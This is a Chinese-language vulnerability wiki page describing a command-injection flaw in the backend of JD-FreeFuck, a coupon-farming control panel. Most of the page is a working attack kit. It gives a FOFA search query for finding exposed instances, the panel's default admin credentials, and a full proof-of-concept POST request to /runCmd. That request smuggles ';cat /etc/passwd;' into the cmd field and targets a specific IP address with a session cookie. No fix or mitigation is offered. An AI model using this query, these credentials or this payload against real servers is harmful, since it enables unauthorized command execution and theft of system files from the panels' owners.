menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right Vulnerability-棱角社区(Vulnerability)项目漏洞-20210715 chevron_right JD-FreeFuck 后台命令执行漏洞.md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    JD-FreeFuck 后台命令执行漏洞.md
    1.02 KB / 2021-05-21 09:14:38
        # JD-FreeFuck 后台命令执行漏洞

JD-FreeFuck 存在后台命令执行漏洞,由于传参执行命令时没有对内容过滤,导致可以执行任意命令,控制服务器

项目地址:https://github.com/meselson/JD-FreeFuck

FOFA:

```
title="京东薅羊毛控制面板"
```

默认账号密码为

`useradmin/supermanito`

PoC:

```bash
POST /runCmd HTTP/1.1
Host: 101.200.189.251:5678
Content-Length: 50
Pragma: no-cache
Cache-Control: no-cache
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Cookie: connect.0.6356777726800276=s%3Av1W6DxlSqnPpVgvMCItxElFeKI1Psh4i.eE4ORs0Yz30N0TOg1pUVpOqrpIHyrqIimuXJVO8lE7U
Connection: close

cmd=bash+jd.sh+%3Bcat /etc/passwd%3B+now&delay=500
```

from:https://mp.weixin.qq.com/s/MEcuSnroUh6z3wp9Mi_OkA
    links
    file_download